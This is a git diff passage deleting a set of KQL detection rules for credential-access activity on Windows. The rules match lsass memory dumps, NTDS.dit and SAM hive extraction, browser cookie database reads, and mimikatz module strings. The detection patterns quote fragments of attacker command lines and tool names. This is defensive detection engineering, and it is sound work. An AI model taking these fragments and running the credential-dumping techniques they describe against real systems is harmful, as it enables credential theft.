+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/07/20
-// Level: medium
-// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
-// Tags: attack.credential_access, attack.t1552.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".key" or ProcessCommandLine contains ".pgp" or ProcessCommandLine contains ".gpg" or ProcessCommandLine contains ".ppk" or ProcessCommandLine contains ".p12" or ProcessCommandLine contains ".pem" or ProcessCommandLine contains ".pfx" or ProcessCommandLine contains ".cer" or ProcessCommandLine contains ".p7b" or ProcessCommandLine contains ".asc") and ((ProcessCommandLine contains "dir " and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or (ProcessCommandLine contains "Get-ChildItem " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) or (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql b/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql
deleted file mode 100644
index 3f8a20a2..00000000
--- a/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/10
-// Level: high
-// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
-// Tags: attack.defense_evasion, attack.t1218.011, attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall"))))
\ No newline at end of file
diff --git a/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql b/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql
deleted file mode 100644
index 2530eb6f..00000000
--- a/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/02/18
-// Level: high
-// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1036, attack.t1003.001, car.2013-05-009
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))
\ No newline at end of file
diff --git a/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql b/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql
deleted file mode 100644
index dfd4dc8d..00000000
--- a/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/09/24
-// Level: high
-// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "fullmemdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "-memdmp") and (ProcessCommandLine contains " -o " or ProcessCommandLine contains " /o ") and (ProcessCommandLine contains " -p " or ProcessCommandLine contains " /p ")) or ((FolderPath endswith "\\rdrleakdiag.exe" or ProcessVersionInfoOriginalFileName =~ "RdrLeakDiag.exe") and (ProcessCommandLine contains "fullmemdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "-memdmp"))
\ No newline at end of file
diff --git a/Credential Access/QuarksPwDump_Dump_File.kql b/Credential Access/QuarksPwDump_Dump_File.kql
deleted file mode 100644
index f54a872d..00000000
--- a/Credential Access/QuarksPwDump_Dump_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/02/10
-// Level: critical
-// Description: Detects a dump file written by QuarksPwDump password dumper
-// Tags: attack.credential_access, attack.t1003.002
-DeviceFileEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\SAM-" and FolderPath contains ".dmp"
\ No newline at end of file
diff --git a/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql b/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql
deleted file mode 100644
index 630b3df1..00000000
--- a/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: TropChaud
-// Date: 2022/12/19
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
-// Tags: attack.credential_access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql b/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql
deleted file mode 100644
index fbc2f1fc..00000000
--- a/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/08
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
-// Tags: attack.credential_access, attack.t1539, attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/Credential Access/SafetyKatz_Default_Dump_Filename.kql b/Credential Access/SafetyKatz_Default_Dump_Filename.kql
deleted file mode 100644
index a2762bbb..00000000
--- a/Credential Access/SafetyKatz_Default_Dump_Filename.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis
-// Date: 2018/07/24
-// Level: high
-// Description: Detects default lsass dump filename from SafetyKatz
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath endswith "\\Temp\\debug.bin"
\ No newline at end of file
diff --git a/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql b/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql
deleted file mode 100644
index 07998e4b..00000000
--- a/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024/05/10
-// Level: high
-// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
-Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
-
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "start" or ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") and (ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit")
\ No newline at end of file
diff --git a/Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql b/Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql
deleted file mode 100644
index b8e893e8..00000000
--- a/Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024/05/10
-// Level: high
-// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
-Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
-
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") and (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql b/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql
deleted file mode 100644
index e9be73a7..00000000
--- a/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/22
-// Level: medium
-// Description: Shadow Copies creation using operating systems utilities, possible credential access
-// Tags: attack.credential_access, attack.t1003, attack.t1003.002, attack.t1003.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "shadow" and ProcessCommandLine contains "create") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE")))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql b/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql
deleted file mode 100644
index 9babcb21..00000000
--- a/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: high
-// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory.
-// Tags: attack.credential_access, attack.t1552.001, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "snapshot" and (FolderPath endswith "\\ADExplorer.exe" or ProcessVersionInfoOriginalFileName =~ "AdExp") and (ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Dump64.exe_Execution.kql b/Credential Access/Suspicious_Dump64.exe_Execution.kql
deleted file mode 100644
index 0f7d9a83..00000000
--- a/Credential Access/Suspicious_Dump64.exe_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger, Florian Roth
-// Date: 2021/11/26
-// Level: high
-// Description: Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\dump64.exe" and (not(FolderPath contains "\\Installer\\Feedback\\dump64.exe"))) or (FolderPath endswith "\\dump64.exe" and (ProcessCommandLine contains " -ma " or ProcessCommandLine contains "accepteula"))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql b/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql
deleted file mode 100644
index 564a514a..00000000
--- a/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @SerkinValery
-// Date: 2022/09/16
-// Level: high
-// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
-// Tags: attack.credential_access, attack.t1528
-DeviceFileEvents
-| where (FolderPath contains "\\Microsoft\\Teams\\Cookies" or FolderPath contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Key_Manager_Access.kql b/Credential Access/Suspicious_Key_Manager_Access.kql
deleted file mode 100644
index 4ccbd4ac..00000000
--- a/Credential Access/Suspicious_Key_Manager_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/21
-// Level: high
-// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
-// Tags: attack.credential_access, attack.t1555.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "keymgr" and ProcessCommandLine contains "KRShowKeyMgr") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql b/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql
deleted file mode 100644
index df06d4d8..00000000
--- a/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Elastic (idea), Tobias Michalski (Nextron Systems)
-// Date: 2022/05/04
-// Level: high
-// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
-// Tags: attack.privilege_escalation, attack.credential_access, attack.t1212
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql b/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql
deleted file mode 100644
index 230502e3..00000000
--- a/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.
-// Tags: attack.credential_access, attack.t1528
-DeviceProcessEvents
-| where ProcessCommandLine contains "eyJ0eXAiOi" or ProcessCommandLine contains " eyJ0eX" or ProcessCommandLine contains " \"eyJ0eX\"" or ProcessCommandLine contains " 'eyJ0eX'"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_PFX_File_Creation.kql b/Credential Access/Suspicious_PFX_File_Creation.kql
deleted file mode 100644
index 882b9d15..00000000
--- a/Credential Access/Suspicious_PFX_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.
-// Tags: attack.credential_access, attack.t1552.004
-DeviceFileEvents
-| where FolderPath endswith ".pfx" and (not((FolderPath contains "\\Templates\\Windows\\Windows_TemporaryKey.pfx" and FolderPath contains "\\CMake\\")))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql b/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql
deleted file mode 100644
index 88ae7640..00000000
--- a/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/11
-// Level: high
-// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "ac i ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "/c copy " and ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") or (ProcessCommandLine contains "activate instance ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "ntds.dit") or ((FolderPath endswith "\\NTDSDump.exe" or FolderPath endswith "\\NTDSDumpEx.exe") or (ProcessCommandLine contains "ntds.dit" and ProcessCommandLine contains "system.hiv") or ProcessCommandLine contains "NTDSgrab.ps1")) or (((InitiatingProcessFolderPath contains "\\apache" or InitiatingProcessFolderPath contains "\\tomcat" or InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\") or (FolderPath contains "\\apache" or FolderPath contains "\\tomcat" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Public\\" or FolderPath contains "\\PerfLogs\\")) and ProcessCommandLine contains "ntds.dit")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Reg_Add_Open_Command.kql b/Credential Access/Suspicious_Reg_Add_Open_Command.kql
deleted file mode 100644
index 9ff5ebd0..00000000
--- a/Credential Access/Suspicious_Reg_Add_Open_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: medium
-// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/ve " and ProcessCommandLine contains "/d") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "DelegateExecute") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql b/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql
deleted file mode 100644
index 76673450..00000000
--- a/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
-// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027
-DeviceProcessEvents
-| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" 
or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd"))))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql b/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql
deleted file mode 100644
index 5733d349..00000000
--- a/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/04/09
-// Level: medium
-// Description: Detects Access to Domain Group Policies stored in SYSVOL
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\SYSVOL\\" and ProcessCommandLine contains "\\policies\\"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Serv-U_Process_Pattern.kql b/Credential Access/Suspicious_Serv-U_Process_Pattern.kql
deleted file mode 100644
index 2f0ddfb0..00000000
--- a/Credential Access/Suspicious_Serv-U_Process_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/14
-// Level: high
-// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
-// Tags: attack.credential_access, attack.t1555, cve.2021.35211
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe") and InitiatingProcessFolderPath endswith "\\Serv-U.exe"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Unattend.xml_File_Access.kql b/Credential Access/Suspicious_Unattend.xml_File_Access.kql
deleted file mode 100644
index 4f10fd22..00000000
--- a/Credential Access/Suspicious_Unattend.xml_File_Access.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/19
-// Level: medium
-// Description: Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
-If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process
-
-// Tags: attack.credential_access, attack.t1552.001
-DeviceFileEvents
-| where FolderPath endswith "\\unattend.xml"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql b/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql
deleted file mode 100644
index 2de6740e..00000000
--- a/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/14
-// Level: medium
-// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "snapshot" and ProcessCommandLine contains "mount ") or (ProcessCommandLine contains "ac" and ProcessCommandLine contains " i" and ProcessCommandLine contains " ntds")) and (FolderPath endswith "\\ntdsutil.exe" or ProcessVersionInfoOriginalFileName =~ "ntdsutil.exe")
\ No newline at end of file
diff --git a/Credential Access/Time_Travel_Debugging_Utility_Usage.kql b/Credential Access/Time_Travel_Debugging_Utility_Usage.kql
deleted file mode 100644
index 676604a5..00000000
--- a/Credential Access/Time_Travel_Debugging_Utility_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\tttracer.exe"
\ No newline at end of file
diff --git a/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql b/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql
deleted file mode 100644
index 856e72cb..00000000
--- a/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll"
\ No newline at end of file
diff --git a/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql b/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql
deleted file mode 100644
index a1ad103b..00000000
--- a/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/23
-// Level: high
-// Description: Detects files written by the different tools that exploit HiveNightmare
-// Tags: attack.credential_access, attack.t1552.001, cve.2021.36934
-DeviceFileEvents
-| where (FolderPath contains "\\hive_sam_" or FolderPath contains "\\SAM-2021-" or FolderPath contains "\\SAM-2022-" or FolderPath contains "\\SAM-2023-" or FolderPath contains "\\SAM-haxx" or FolderPath contains "\\Sam.save") or FolderPath =~ "C:\\windows\\temp\\sam"
\ No newline at end of file
diff --git a/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql b/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql
deleted file mode 100644
index 959bf177..00000000
--- a/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Ilyas Ochkov, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
-
-// Tags: attack.credential_access, attack.t1558, attack.lateral_movement, attack.t1550.003
-DeviceNetworkEvents
